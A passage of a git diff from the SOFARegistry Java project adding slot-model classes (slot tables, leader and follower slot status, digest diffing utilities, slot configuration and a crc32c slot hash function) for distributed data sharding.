slotTableEpoch + */ + public void setSlotTableEpoch(long slotTableEpoch) { + this.slotTableEpoch = slotTableEpoch; + } + + /** + * Getter method for property updatedPublishers. + * + * @return property value of updatedPublishers + */ + public Map> getUpdatedPublishers() { + return Collections.unmodifiableMap(updatedPublishers); + } + + /** + * Getter method for property removedPublishers. + * + * @return property value of removedPublishers + */ + public Map> getRemovedPublishers() { + return Collections.unmodifiableMap(removedPublishers); + } + + public int getRemovedPublishersCount() { + int count = 0; + for (List list : removedPublishers.values()) { + count += list.size(); + } + return count; + } + + public int getUpdatedPublishersCount() { + int count = 0; + for (List list : updatedPublishers.values()) { + count += list.size(); + } + return count; + } + + /** + * Getter method for property sessionProcessId. + * + * @return property value of sessionProcessId + */ + public ProcessId getSessionProcessId() { + return sessionProcessId; + } + + /** + * Setter method for property sessionProcessId. + * + * @param sessionProcessId value to be assigned to property sessionProcessId + */ + public void setSessionProcessId(ProcessId sessionProcessId) { + this.sessionProcessId = sessionProcessId; + } + + public boolean isEmpty() { + return MapUtils.isEmpty(updatedPublishers) && MapUtils.isEmpty(removedPublishers); + } + + public Set syncDataInfoIds() { + Set ret = Sets.newHashSet(); + ret.addAll(updatedPublishers.keySet()); + ret.addAll(removedPublishers.keySet()); + return ret; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/DataSlotDiffUtils.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/DataSlotDiffUtils.java new file mode 100644 index 000000000..5b7748f69 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/DataSlotDiffUtils.java @@ -0,0 +1,157 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot; + +import com.alipay.sofa.registry.common.model.PublisherDigestUtil; +import com.alipay.sofa.registry.common.model.PublisherUtils; +import com.alipay.sofa.registry.common.model.RegisterVersion; +import com.alipay.sofa.registry.common.model.dataserver.DatumDigest; +import com.alipay.sofa.registry.common.model.dataserver.DatumSummary; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import java.util.*; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-24 15:46 yuzhi.lyz Exp $ + */ +public final class DataSlotDiffUtils { + private static final Logger SYNC_LOGGER = LoggerFactory.getLogger("SYNC-SRV"); + + private DataSlotDiffUtils() {} + + public static DataSlotDiffDigestResult diffDigestResult( + Map targetDigestMap, + Map> sourcePublishers) { + Map sourceSummaryMap = PublisherUtils.getDatumSummary(sourcePublishers); + Map digestMap = PublisherDigestUtil.digest(sourceSummaryMap); + return diffDigest(targetDigestMap, digestMap); + } + + public static DataSlotDiffDigestResult diffDigest( + Map targetDigestMap, Map sourceDigestMap) { + List adds = Lists.newArrayList(); + List updates = Lists.newArrayList(); + for (Map.Entry e : sourceDigestMap.entrySet()) { + final String dataInfoId = e.getKey(); + DatumDigest targetDigest = targetDigestMap.get(dataInfoId); + if (targetDigest == null) { + adds.add(dataInfoId); + continue; + } + if (!targetDigest.equals(e.getValue())) { + updates.add(dataInfoId); + } + } + + // find the removed dataInfoIds + List removes = new ArrayList<>(); + for (String dataInfoId : targetDigestMap.keySet()) { + if (!sourceDigestMap.containsKey(dataInfoId)) { + removes.add(dataInfoId); + } + } + DataSlotDiffDigestResult result = new DataSlotDiffDigestResult(updates, adds, removes); + return result; + } + + public static DataSlotDiffPublisherResult diffPublishersResult( + Collection targetDatumSummaries, + Map> sourcePublishers, + int publisherMaxNum) { + Map> updatePublishers = + Maps.newHashMapWithExpectedSize(targetDatumSummaries.size()); + Map> removedPublishers = new HashMap<>(); + + int publisherCount = 0; + int checkRound = 0; + for (DatumSummary summary : targetDatumSummaries) { + checkRound++; + final String dataInfoId = summary.getDataInfoId(); + Map publisherMap = sourcePublishers.get(dataInfoId); + if (publisherMap == null) { + // the dataInfoId has removed, do not handle it, diffDataInfoIds will handle it + continue; + } + Set registerIds = summary.getPublisherVersions().keySet(); + for (String registerId : registerIds) { + if (!publisherMap.containsKey(registerId)) { + List list = removedPublishers.computeIfAbsent(dataInfoId, k -> new ArrayList<>()); + list.add(registerId); + } + } + List publishers = new ArrayList<>(); + Map versions = summary.getPublisherVersions(); + for (Map.Entry p : publisherMap.entrySet()) { + final String registerId = p.getKey(); + if (!versions.containsKey(registerId)) { + publishers.add(p.getValue()); + continue; + } + // compare version + if (p.getValue().registerVersion().equals(versions.get(registerId))) { + // the same + continue; + } + publishers.add(p.getValue()); + } + if (!publishers.isEmpty()) { + publisherCount += publishers.size(); + updatePublishers.put(dataInfoId, publishers); + } + if (publisherCount >= publisherMaxNum) { + // too many publishers, mark has remain + break; + } + } + // the iter has break + final boolean hasRemian = checkRound != targetDatumSummaries.size(); + DataSlotDiffPublisherResult result = + new DataSlotDiffPublisherResult(hasRemian, updatePublishers, removedPublishers); + return result; + } + + public static void logDiffResult(DataSlotDiffPublisherResult result, int slotId) { + if (!result.isEmpty()) { + SYNC_LOGGER.info( + "DiffPublisher, slotId={}, remain={}, update={}/{}, remove={}/{}, removes={}", + slotId, + result.isHasRemain(), + result.getUpdatedPublishers().size(), + result.getUpdatedPublishersCount(), + result.getRemovedPublishers().size(), + result.getRemovedPublishersCount(), + result.getRemovedPublishers().keySet()); + } + } + + public static void logDiffResult(DataSlotDiffDigestResult result, int slotId) { + if (!result.isEmpty()) { + SYNC_LOGGER.info( + "DiffDigest, slotId={}, update={}, add={}, remove={}, adds={}, removes={}", + slotId, + result.getUpdatedDataInfoIds().size(), + result.getAddedDataInfoIds().size(), + result.getRemovedDataInfoIds().size(), + result.getAddedDataInfoIds(), + result.getRemovedDataInfoIds()); + } + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/FollowerSlotStatus.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/FollowerSlotStatus.java new file mode 100644 index 000000000..01e37bff3 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/FollowerSlotStatus.java @@ -0,0 +1,92 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot; + +import java.io.Serializable; + +/** + * @author chen.zhu + *

Mar 01, 2021 + */ +public class FollowerSlotStatus extends BaseSlotStatus implements Serializable { + + private final long lastSyncTaskStartTime; + + private final long lastLeaderSyncTime; + + /** + * Constructor. + * + * @param slotId the slot id + * @param slotLeaderEpoch the slot leader epoch + * @param server the server + * @param lastSyncTaskStartTime the last sync task start time + * @param lastLeaderSyncTime the last leader sync time + */ + public FollowerSlotStatus( + int slotId, + long slotLeaderEpoch, + String server, + long lastSyncTaskStartTime, + long lastLeaderSyncTime) { + super(slotId, slotLeaderEpoch, Slot.Role.Follower, server); + this.lastSyncTaskStartTime = lastSyncTaskStartTime; + this.lastLeaderSyncTime = lastLeaderSyncTime; + } + + /** + * Gets get last sync task start time. + * + * @return the get last sync task start time + */ + public long getLastSyncTaskStartTime() { + return lastSyncTaskStartTime; + } + + /** + * Gets get last follower sync time. + * + * @return the get last follower sync time + */ + public long getLastLeaderSyncTime() { + return lastLeaderSyncTime; + } + + /** + * To string string. + * + * @return the string + */ + @Override + public String toString() { + return "FollowerSlotStatus{" + + "lastSyncTaskStartTime=" + + lastSyncTaskStartTime + + ", lastLeaderSyncTime=" + + lastLeaderSyncTime + + ", slotId=" + + slotId + + ", slotLeaderEpoch=" + + slotLeaderEpoch + + ", role=" + + role + + ", server='" + + server + + '\'' + + '}'; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/LeaderSlotStatus.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/LeaderSlotStatus.java new file mode 100644 index 000000000..22bf3cded --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/LeaderSlotStatus.java @@ -0,0 +1,68 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot; + +import java.io.Serializable; + +/** + * @author chen.zhu + *

Mar 01, 2021 + */ +public class LeaderSlotStatus extends BaseSlotStatus implements Serializable { + + private final LeaderStatus leaderStatus; + + /** + * Constructor. + * + * @param slotId the slot id + * @param slotLeaderEpoch the slot leader epoch + * @param server the server + * @param leaderStatus the leader status + */ + public LeaderSlotStatus( + int slotId, long slotLeaderEpoch, String server, LeaderStatus leaderStatus) { + super(slotId, slotLeaderEpoch, Slot.Role.Leader, server); + this.leaderStatus = leaderStatus; + } + + /** + * Gets get leader status. + * + * @return the get leader status + */ + public LeaderStatus getLeaderStatus() { + return leaderStatus; + } + + @Override + public String toString() { + return "LeaderSlotStatus{" + + "leaderStatus=" + + leaderStatus + + ", slotId=" + + slotId + + ", slotLeaderEpoch=" + + slotLeaderEpoch + + ", role=" + + role + + ", server='" + + server + + '\'' + + '}'; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/Slot.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/Slot.java new file mode 100644 index 000000000..13e6cb36b --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/Slot.java @@ -0,0 +1,122 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot; + +import com.fasterxml.jackson.annotation.JsonCreator; +import com.fasterxml.jackson.annotation.JsonProperty; +import java.io.Serializable; +import java.util.*; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-10-30 10:12 yuzhi.lyz Exp $ + */ +public final class Slot implements Serializable, Cloneable { + public enum Role { + Leader, + Follower, + } + + private final int id; + private final String leader; + private final long leaderEpoch; + private final Set followers; + + @JsonCreator(mode = JsonCreator.Mode.PROPERTIES) + public Slot( + @JsonProperty("id") int id, + @JsonProperty("leader") String leader, + @JsonProperty("leaderEpoch") long leaderEpoch, + @JsonProperty("followers") Collection followers) { + this.id = id; + this.leader = leader; + this.leaderEpoch = leaderEpoch; + this.followers = Collections.unmodifiableSet(new HashSet<>(followers)); + } + + @Override + protected Slot clone() { + return new Slot(this.id, this.leader, this.leaderEpoch, this.followers); + } + + /** + * Getter method for property id. + * + * @return property value of id + */ + public int getId() { + return id; + } + + /** + * Getter method for property leader. + * + * @return property value of leader + */ + public String getLeader() { + return leader; + } + + /** + * Getter method for property followers. + * + * @return property value of followers + */ + public Set getFollowers() { + return followers; + } + + /** + * Getter method for property leaderEpoch. + * + * @return property value of leaderEpoch + */ + public long getLeaderEpoch() { + return leaderEpoch; + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (!(o instanceof Slot)) return false; + Slot slot = (Slot) o; + return id == slot.id + && leaderEpoch == slot.leaderEpoch + && Objects.equals(leader, slot.leader) + && Objects.equals(followers, slot.followers); + } + + @Override + public int hashCode() { + return Objects.hash(id, leader, leaderEpoch, followers); + } + + @Override + public String toString() { + return "Slot{" + + "id=" + + id + + ", leader='" + + leader + + '\'' + + ", leaderEpoch=" + + leaderEpoch + + ", followers=" + + followers + + '}'; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/SlotAccess.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/SlotAccess.java new file mode 100644 index 000000000..89944ba1a --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/SlotAccess.java @@ -0,0 +1,90 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot; + +import java.io.Serializable; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-10-30 10:34 yuzhi.lyz Exp $ + */ +public final class SlotAccess implements Serializable { + public enum Status { + Accept, + Migrating, + Moved, + MisMatch, + } + + private final int slotId; + private final Status status; + private final long slotTableEpoch; + private final long slotLeaderEpoch; + + public SlotAccess(int slotId, long slotTableEpoch, Status status, long slotLeaderEpoch) { + this.slotTableEpoch = slotTableEpoch; + this.slotId = slotId; + this.status = status; + this.slotLeaderEpoch = slotLeaderEpoch; + } + + public boolean isMoved() { + return status == Status.Moved; + } + + public boolean isMigrating() { + return status == Status.Migrating; + } + + public boolean isAccept() { + return status == Status.Accept; + } + + public boolean isMisMatch() { + return status == Status.MisMatch; + } + + public Status getStatus() { + return status; + } + + public int getSlotId() { + return slotId; + } + + public long getSlotTableEpoch() { + return slotTableEpoch; + } + + public long getSlotLeaderEpoch() { + return slotLeaderEpoch; + } + + @Override + public String toString() { + return "SlotAccess{" + + "slotId=" + + slotId + + ", status=" + + status + + ", tableEpoch=" + + slotTableEpoch + + ", leaderEpoch=" + + slotLeaderEpoch + + '}'; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/SlotAccessGenericResponse.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/SlotAccessGenericResponse.java new file mode 100644 index 000000000..cf2f1e18b --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/SlotAccessGenericResponse.java @@ -0,0 +1,60 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot; + +import com.alipay.sofa.registry.common.model.GenericResponse; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-10-30 11:05 yuzhi.lyz Exp $ + */ +public final class SlotAccessGenericResponse extends GenericResponse { + private final SlotAccess slotAccess; + + private SlotAccessGenericResponse( + boolean success, String message, SlotAccess slotAccess, T data) { + this.slotAccess = slotAccess; + this.setData(data); + this.setSuccess(success); + this.setMessage(message); + } + + /** + * Getter method for property slotAccess. + * + * @return property value of slotAccess + */ + public SlotAccess getSlotAccess() { + return slotAccess; + } + + public static SlotAccessGenericResponse successResponse(SlotAccess access, T data) { + return new SlotAccessGenericResponse(true, null, access, data); + } + + public static SlotAccessGenericResponse failedResponse(SlotAccess access) { + return new SlotAccessGenericResponse(false, access.toString(), access, null); + } + + public static SlotAccessGenericResponse failedResponse(SlotAccess access, String msg) { + return new SlotAccessGenericResponse(false, msg, access, null); + } + + public static SlotAccessGenericResponse failedResponse(String msg) { + return new SlotAccessGenericResponse(false, msg, null, null); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/SlotConfig.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/SlotConfig.java new file mode 100644 index 000000000..c2921ad30 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/SlotConfig.java @@ -0,0 +1,113 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.util.SystemUtils; +import java.io.Serializable; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-13 20:00 yuzhi.lyz Exp $ + */ +public final class SlotConfig { + + private static final Logger LOGGER = LoggerFactory.getLogger(SlotConfig.class); + + public static final String KEY_DATA_SLOT_NUM = "registry.data.slot.num"; + private static final String KEY_DATA_SLOT_FUNC = "registry.data.slot.func"; + private static final String KEY_DATA_SLOT_REPLICAS = "registry.data.slot.replicas"; + public static final int SLOT_NUM; + public static final int SLOT_REPLICAS; + public static final String FUNC; + + private SlotConfig() {} + + static { + SLOT_NUM = SystemUtils.getSystemInteger(KEY_DATA_SLOT_NUM, 256); + if (SLOT_NUM <= 0) { + throw new IllegalArgumentException("illegal " + KEY_DATA_SLOT_NUM + ":" + SLOT_NUM); + } + SLOT_REPLICAS = SystemUtils.getSystemInteger(KEY_DATA_SLOT_REPLICAS, 2); + if (SLOT_REPLICAS <= 0) { + throw new IllegalArgumentException("illegal " + KEY_DATA_SLOT_REPLICAS + ":" + SLOT_REPLICAS); + } + FUNC = SystemUtils.getSystem(KEY_DATA_SLOT_FUNC, "crc32c"); + LOGGER.info( + "init slot config, {}={}, {}={}, {}={}", + KEY_DATA_SLOT_NUM, + SLOT_NUM, + KEY_DATA_SLOT_REPLICAS, + SLOT_REPLICAS, + KEY_DATA_SLOT_FUNC, + FUNC); + } + + public static SlotBasicInfo slotBasicInfo() { + return new SlotBasicInfo(SLOT_NUM, SLOT_REPLICAS, FUNC); + } + + public static class SlotBasicInfo implements Serializable { + + private final int slotNum; + + private final int slotReplicas; + + private final String slotFunc; + + /** + * Constructor. + * + * @param slotNum the slot num + * @param slotReplicas the slot replicas + * @param slotFunc the slot func + */ + public SlotBasicInfo(int slotNum, int slotReplicas, String slotFunc) { + this.slotNum = slotNum; + this.slotReplicas = slotReplicas; + this.slotFunc = slotFunc; + } + + /** + * Gets get slot num. + * + * @return the get slot num + */ + public int getSlotNum() { + return slotNum; + } + + /** + * Gets get slot replicas. + * + * @return the get slot replicas + */ + public int getSlotReplicas() { + return slotReplicas; + } + + /** + * Gets get slot func. + * + * @return the get slot func + */ + public String getSlotFunc() { + return slotFunc; + } + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/SlotTable.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/SlotTable.java new file mode 100644 index 000000000..b52b98164 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/SlotTable.java @@ -0,0 +1,283 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot; + +import com.alipay.sofa.registry.exception.SofaRegistrySlotTableException; +import com.alipay.sofa.registry.util.JsonUtils; +import com.alipay.sofa.registry.util.StringFormatter; +import com.fasterxml.jackson.annotation.JsonIgnore; +import com.google.common.collect.Maps; +import com.google.common.collect.Sets; +import java.io.Serializable; +import java.util.*; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-10-30 10:08 yuzhi.lyz Exp $ + */ +public final class SlotTable implements Serializable { + public static final SlotTable INIT = new SlotTable(-1, Collections.emptyList()); + private final long epoch; + private final Map slots; + + private SlotTable(long epoch, Map slots) { + this.epoch = epoch; + this.slots = Collections.unmodifiableSortedMap(new TreeMap<>(slots)); + } + + public SlotTable(long epoch, final Collection slots) { + this.epoch = epoch; + SortedMap slotMap = Maps.newTreeMap(); + slots.forEach( + slot -> { + Slot exist = slotMap.putIfAbsent(slot.getId(), slot); + if (exist != null) { + throw new SofaRegistrySlotTableException( + "dup slot when construct slot table: " + JsonUtils.writeValueAsString(slots)); + } + }); + this.slots = Collections.unmodifiableSortedMap(slotMap); + } + + public List getSlots() { + return new ArrayList<>(slots.values()); + } + + @JsonIgnore + public Map getSlotMap() { + return Maps.newHashMap(slots); + } + + @JsonIgnore + public Set getSlotIds() { + return new TreeSet<>(slots.keySet()); + } + + public Slot getSlot(int slotId) { + return slots.get(slotId); + } + + public Map slotLeaders() { + Map ret = Maps.newTreeMap(); + for (Map.Entry e : slots.entrySet()) { + ret.put(e.getKey(), e.getValue().getLeader()); + } + return ret; + } + + /** + * Getter method for property epoch. + * + * @return property value of epoch + */ + public long getEpoch() { + return epoch; + } + + @Override + public String toString() { + return StringFormatter.format( + "SlotTable{epoch={}, num={}, leaders={}}", epoch, slots.size(), slotLeaders()); + } + + /** the slot table is too big for rpc */ + public List transfer(String targetDataNode, boolean ignoreFollowers) { + Map> leadersMap = new HashMap<>(); + Map> followersMap = new HashMap<>(); + for (Slot slot : slots.values()) { + if (targetDataNode == null) { + List leaders = + leadersMap.computeIfAbsent(slot.getLeader(), k -> new ArrayList<>()); + leaders.add(slot.getId()); + if (!ignoreFollowers) { + for (String follower : slot.getFollowers()) { + List followers = + followersMap.computeIfAbsent(follower, k -> new ArrayList<>()); + followers.add(slot.getId()); + } + } + continue; + } + if (!ignoreFollowers && slot.getFollowers().contains(targetDataNode)) { + List followers = + followersMap.computeIfAbsent(targetDataNode, k -> new ArrayList<>()); + followers.add(slot.getId()); + } + if (targetDataNode.equals(slot.getLeader())) { + List leaders = + leadersMap.computeIfAbsent(slot.getLeader(), k -> new ArrayList<>()); + leaders.add(slot.getId()); + } + } + Map dataNodeSlotMap = Maps.newHashMapWithExpectedSize(leadersMap.size()); + for (Map.Entry> e : leadersMap.entrySet()) { + DataNodeSlot dataNodeSlot = + dataNodeSlotMap.computeIfAbsent(e.getKey(), k -> new DataNodeSlot(k)); + Collections.sort(e.getValue()); + dataNodeSlot.addLeader(e.getValue()); + } + for (Map.Entry> e : followersMap.entrySet()) { + DataNodeSlot dataNodeSlot = + dataNodeSlotMap.computeIfAbsent(e.getKey(), k -> new DataNodeSlot(k)); + Collections.sort(e.getValue()); + dataNodeSlot.addFollower(e.getValue()); + } + return new ArrayList<>(dataNodeSlotMap.values()); + } + + public Set getDataServers() { + final Set servers = Sets.newTreeSet(); + slots + .values() + .forEach( + s -> { + servers.add(s.getLeader()); + servers.addAll(s.getFollowers()); + }); + return servers; + } + + public SlotTable filter(String ip) { + if (slots.isEmpty()) { + return this; + } + final Map slotMap = Maps.newHashMapWithExpectedSize(slots.size()); + slots.forEach( + (k, v) -> { + if (v.getLeader().equals(ip) || v.getFollowers().contains(ip)) { + slotMap.put(k, v); + } + }); + return new SlotTable(epoch, slotMap); + } + + public int getLeaderNum(String dataServerIp) { + return (int) slots.values().stream().filter(s -> dataServerIp.equals(s.getLeader())).count(); + } + + public int getFollowerNum(String dataServerIp) { + return (int) + slots.values().stream().filter(s -> s.getFollowers().contains(dataServerIp)).count(); + } + + public void assertSlotLessThan(SlotTable slotTable) { + slots + .values() + .forEach( + s -> { + Slot newSlot = slotTable.getSlot(s.getId()); + if (newSlot == null) { + return; + } + if (s.getLeaderEpoch() > newSlot.getLeaderEpoch()) { + throw new RuntimeException( + String.format("not expect Slot.LeaderEpoch, %s, %s", s, newSlot)); + } + }); + } + + @Override + public boolean equals(Object o) { + if (this == o) { + return true; + } + if (o == null || getClass() != o.getClass()) { + return false; + } + SlotTable slotTable = (SlotTable) o; + return epoch == slotTable.epoch && slots.equals(slotTable.slots); + } + + @Override + public int hashCode() { + return Objects.hash(epoch, slots); + } + + public static final class SlotTableBuilder { + + private final long epoch; + + private final Map slotBuilderMap = Maps.newHashMap(); + + private SlotTableBuilder(long epoch) { + this.epoch = epoch; + } + + public SlotTableBuilder slotLeader(int slotId, String leader) { + slotBuilderMap.putIfAbsent(slotId, new SlotBuilder(slotId)); + slotBuilderMap.get(slotId).leader(leader); + return this; + } + + public SlotTableBuilder slotFollower(int slotId, String follower) { + slotBuilderMap.putIfAbsent(slotId, new SlotBuilder(slotId)); + slotBuilderMap.get(slotId).follower(follower); + return this; + } + + public SlotTable build() { + Map slotMap = Maps.newHashMap(); + for (Map.Entry entry : slotBuilderMap.entrySet()) { + slotMap.put(entry.getKey(), entry.getValue().build()); + } + return new SlotTable(epoch, slotMap); + } + } + + private static final class SlotBuilder { + + private final int slotId; + + private String leader; + + private long leaderEpoch; + + private final Set followers = Sets.newHashSet(); + + public SlotBuilder(int slotId) { + this.slotId = slotId; + } + + public SlotBuilder leader(String leader) { + if (this.leader != null) { + throw new IllegalStateException( + String.format("leader is not null(%s), but try to set (%s)", this.leader, leader)); + } + this.leader = leader; + return this; + } + + public SlotBuilder followers(String... follower) { + followers.addAll(Arrays.asList(follower)); + return this; + } + + public SlotBuilder follower(String foll) { + followers.add(foll); + return this; + } + + public SlotBuilder leaderEpoch(long leaderEpoch) { + this.leaderEpoch = leaderEpoch; + return this; + } + + public Slot build() { + return new Slot(slotId, leader, leaderEpoch, followers); + } + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/func/Crc32cSlotFunction.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/func/Crc32cSlotFunction.java new file mode 100644 index 000000000..9c5ed4d46 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/func/Crc32cSlotFunction.java @@ -0,0 +1,63 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot.func; + +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.google.common.hash.HashFunction; +import com.google.common.hash.Hashing; +import java.nio.charset.Charset; +import java.nio.charset.StandardCharsets; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public class Crc32cSlotFunction implements SlotFunction { + public static final Crc32cSlotFunction INSTANCE = new Crc32cSlotFunction(); + private final int slotMask; + private final HashFunction crc32c = Hashing.crc32c(); + + public Crc32cSlotFunction() { + this(SlotConfig.SLOT_NUM); + } + + public Crc32cSlotFunction(int slotNums) { + this.slotMask = slotNums - 1; + } + + @Override + public String name() { + return "crc32c"; + } + + @Override + public int maxSlots() { + return slotMask + 1; + } + + @Override + public int slotOf(Object o) { + return getCrc32Code(o) & slotMask; + } + + private int getCrc32Code(Object o) { + byte[] bytes = o.toString().getBytes(UTF8); + return Math.abs(crc32c.hashBytes(bytes).asInt()); + } + + private static final Charset UTF8 = StandardCharsets.UTF_8; +} diff --git a/server/consistency/src/main/java/com/alipay/sofa/registry/consistency/hash/HashFunction.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/func/HashFunction.java similarity index 84% rename from server/consistency/src/main/java/com/alipay/sofa/registry/consistency/hash/HashFunction.java rename to server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/func/HashFunction.java index 